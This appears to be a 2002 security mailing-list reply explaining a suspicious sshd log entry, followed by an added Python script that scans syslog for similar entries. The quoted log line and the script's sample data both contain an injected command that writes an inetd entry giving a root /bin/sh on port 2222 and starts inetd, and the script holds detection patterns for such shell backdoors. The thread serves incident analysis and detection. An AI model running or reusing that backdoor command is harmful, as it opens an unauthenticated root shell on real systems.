From: Bill McCarty (bmccartyapu.edu)
Date: Mon Jul 01 2002 - 19:25:26 CDT

    Hi Ulrich,

    These lines resemble an attempt to add a line to the /etc/inetd.conf file
    in order to establish a backdoor. Probably, an attacker's autorooter went
    awry, thought it had compromised the victim host, and prematurely attempted
    to upload a backdoor. Nevertheless, I suggest you check whether any of
    your systems are listening on unusual ports, such as 2222.

    Cheers,

    --On Saturday, June 29, 2002 10:01 PM +0200 Ulrich Keil
    <ulrichder-keiler.de> wrote:

    > I run OpenSSH 3.3p1 on Linux (sparc) and found these lines in my
    > /var/log/messages:
    >
    > Jun 28 22:27:27 www sshd[21761]: Bad protocol version identification
    > 'echo "2222 stream tcp nowait root /bin/sh sh -i">>
    > /tmp/h;/usr/sbin/inetd /tmp/hn/inecho "2222 strea' from 192.192.230.233

    ---------------------------------------------------
    Bill McCarty

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com
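The kind of log entry discussed in this thread can be picked out of a syslog file automatically. The following is an added example, not part of the original messages: it flags sshd "Bad protocol version identification" entries whose client-supplied string looks like a shell command or an inetd service entry, and extracts the port named in it so listeners can be checked. The indicator patterns and the two extra sample lines are assumptions of this example.

```python
import re

# sshd logs the first line a client sends when it is not an "SSH-" banner.
BAD_IDENT = re.compile(
    r"sshd\[(?P<pid>\d+)\]: Bad protocol version identification "
    r"'(?P<ident>.*)' from (?P<src>\S+)"
)
# Heuristics chosen for this example: shell syntax and inetd service
# entries do not belong in an SSH identification string.
INDICATORS = {
    "command_chain": re.compile(r"[;|&`]|\$\("),
    "inetd_entry": re.compile(r"\bstream\s+tcp\s+nowait\b"),
    "shell_binary": re.compile(r"/bin/(?:ba)?sh\b"),
    "shell_redirect": re.compile(r">>?\s*/"),
}
INETD_SERVICE = re.compile(r"\b([\w-]+)\s+stream\s+tcp\s+nowait\b")

# Constructed sample: the first line is the page's log entry with the e-mail
# line wrapping removed; the other two are invented for contrast.
SAMPLE_LOG = """\
Jun 28 22:27:27 www sshd[21761]: Bad protocol version identification 'echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/hn/inecho "2222 strea' from 192.192.230.233
Jun 28 22:30:01 www sshd[21790]: Bad protocol version identification 'GET / HTTP/1.0' from 192.0.2.10
Jun 28 22:31:12 www sshd[21801]: Accepted password for alice from 192.0.2.20 port 40112 ssh2
"""

def analyze(line):
    """Return a finding dict for a bad-identification line, else None."""
    m = BAD_IDENT.search(line)
    if m is None:
        return None
    ident = m.group("ident")
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(ident))
    return {
        "src": m.group("src"),
        "pid": int(m.group("pid")),
        "indicators": hits,
        # Service/port names from injected inetd entries: listeners to check for.
        "ports": sorted(set(INETD_SERVICE.findall(ident))),
        "suspicious": bool(hits),
    }

def scan(lines):
    """Keep only the lines whose identification string looks like a command."""
    return [f for f in map(analyze, lines) if f and f["suspicious"]]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

Each reported port is one to compare against the host's actual listening sockets, as the reply above suggests for 2222.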